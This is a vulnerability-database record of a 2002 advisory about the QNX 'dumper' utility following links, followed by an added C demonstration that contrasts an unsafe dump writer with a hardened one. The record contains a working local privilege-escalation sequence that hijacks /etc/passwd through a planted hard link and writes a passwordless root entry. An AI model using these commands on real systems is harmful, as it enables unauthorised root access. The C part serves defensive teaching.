{"lastseen": "2020-04-01T19:04:44", "references": [], "description": "\nQNX RTOS 4.25 - dumper Arbitrary File Modification", "edition": 1, "reporter": "Simon Ouellette", "exploitpack": {"type": "local", "platform": "linux"}, "published": "2002-05-31T00:00:00", "title": "QNX RTOS 4.25 - dumper Arbitrary File Modification", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2002-05-31T00:00:00", "id": "EXPLOITPACK:1D693296FB7891A710026DE54F71398C", "href": "", "viewCount": 5, "sourceData": "source: https://www.securityfocus.com/bid/4904/info\n\nWhen creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the dump file to the userid of the terminated process. A malicious local user can exploit this to overwrite, and take ownership of, arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'.\n\nExample exploit, with /bin/dumper:\n\nLet EVIL be the unprivileged user who wants to gain root access.\n\n#link to the passwd file (a hard link here; dumper also follows symlinks): dumper dumps to [process name].dmp\n$ ln /etc/passwd /home/EVIL/ksh.dmp\n#call the program that will attempt to write to the hard link\n$ dumper -d /home/EVIL -p [PID of EVIL's ksh]\n#have dumper do its job by terminating the monitored process\n$ exit\n#at this point, /etc/passwd is overwritten by the binary dump, and more\n#importantly: EVIL is now the owner!\n$ echo root::0:0::///:/bin/sh > /etc/passwd\n#but now no login works because /etc/passwd is not owned by userid 0.\n#So you do:\n\n$ passwd\n\n#and change your password. This gives /etc/passwd ownership back to root,\n#keeping the modifications you have made.\n\n$ su\n#", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645470702, "score": 1659814272}, "_internal": {"score_hash": "821a8cec6b242b262fcba8cbcbd1af9c"}}
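Added example, not part of the vulners record or of the original advisory: a C model of the two defects the advisory describes in dumper (writing the dump through whatever name `<process>.dmp` resolves to, then chowning that name to the crashed process's uid), with a hardened writer beside it. It does not call the QNX utility; the function names (`dump_unsafe`, `dump_safe`, `file_equals`, `demo`), the throwaway files under /tmp and the sample passwd and dump contents are all constructed for the demonstration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* mkdtemp(), O_NOFOLLOW */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern, modelled on what the advisory attributes to dumper: open the dump
 * path by name, truncate whatever the name resolves to, then chown() the name to the
 * crashed process's uid. A symlink or hard link planted at <process>.dmp redirects both. */
int dump_unsafe(const char *path, uid_t owner, const void *buf, size_t len)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    ssize_t n = write(fd, buf, len);
    close(fd);
    if (n != (ssize_t)len) return -1;
    return chown(path, owner, (gid_t)-1); /* second name lookup: classic TOCTOU */
}

/* Hardened pattern: refuse any pre-existing name (O_EXCL makes a planted link fail with
 * EEXIST), never follow symlinks (O_NOFOLLOW), confirm via the open descriptor that we
 * hold a fresh regular file with a single link, and fchown() that descriptor, not the path. */
int dump_safe(const char *path, uid_t owner, const void *buf, size_t len)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    ssize_t n = write(fd, buf, len);
    int rc = (n == (ssize_t)len) ? fchown(fd, owner, (gid_t)-1) : -1;
    close(fd);
    return rc;
}

/* Reads a small file back and compares it with the expected string. */
static int file_equals(const char *path, const char *s)
{
    char buf[256];
    int fd = open(path, O_RDONLY);
    if (fd < 0) return 0;
    ssize_t n = read(fd, buf, sizeof buf);
    close(fd);
    return n == (ssize_t)strlen(s) && memcmp(buf, s, (size_t)n) == 0;
}

/* Re-enacts the advisory's link trick on throwaway files under /tmp (constructed data,
 * no real passwd touched). Returns a bitmask: 1 = unsafe writer clobbered the victim
 * through the hard link, 2 = hardened writer refused the planted name and left the victim
 * intact, 4 = hardened writer still works on a fresh name with the owner set. Full demo: 7. */
int demo(void)
{
    char dir[] = "/tmp/dumperdemo.XXXXXX";
    char victim[300], lnk[300], fresh[300];
    const char original[] = "root::0:0::/:/bin/sh\n"; /* constructed "passwd" line */
    const char dump[] = "CORE-DUMP-BYTES";             /* constructed dump payload */
    struct stat st;
    int result = 0;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(victim, sizeof victim, "%s/passwd", dir);
    snprintf(lnk, sizeof lnk, "%s/ksh.dmp", dir); /* attacker's link, named after the process */
    snprintf(fresh, sizeof fresh, "%s/sh.dmp", dir);
    /* seed the victim (plain create, own uid) and plant the hard link */
    if (dump_unsafe(victim, getuid(), original, strlen(original)) != 0 || link(victim, lnk) != 0) goto out;
    if (dump_unsafe(lnk, getuid(), dump, strlen(dump)) == 0 && file_equals(victim, dump))
        result |= 1;
    dump_unsafe(victim, getuid(), original, strlen(original)); /* restore the victim */
    errno = 0;
    if (dump_safe(lnk, getuid(), dump, strlen(dump)) == -1 && errno == EEXIST
        && file_equals(victim, original))
        result |= 2;
    if (dump_safe(fresh, getuid(), dump, strlen(dump)) == 0 && file_equals(fresh, dump)
        && stat(fresh, &st) == 0 && st.st_uid == getuid())
        result |= 4;
out:
    unlink(fresh); unlink(lnk); unlink(victim); rmdir(dir);
    return result;
}

int main(void)
{
    int r = demo();
    printf("unsafe clobbered victim via link: %d, safe refused planted name: %d, safe fresh write: %d\n",
           r & 1, (r >> 1) & 1, (r >> 2) & 1);
    return r == 7 ? 0 : 1;
}
```

O_EXCL is what stops the hard-link variant in the advisory: the attacker's `ksh.dmp` already exists, so the create fails before anything is written, and O_NOFOLLOW plus the fstat() link-count check cover the symlink case and anything swapped in between lookup and open. The remaining weakness the example cannot remove is the predictable `<process>.dmp` name in a directory the attacker controls; a privileged dumper should write into a directory only it can write, or into a descriptor it already holds.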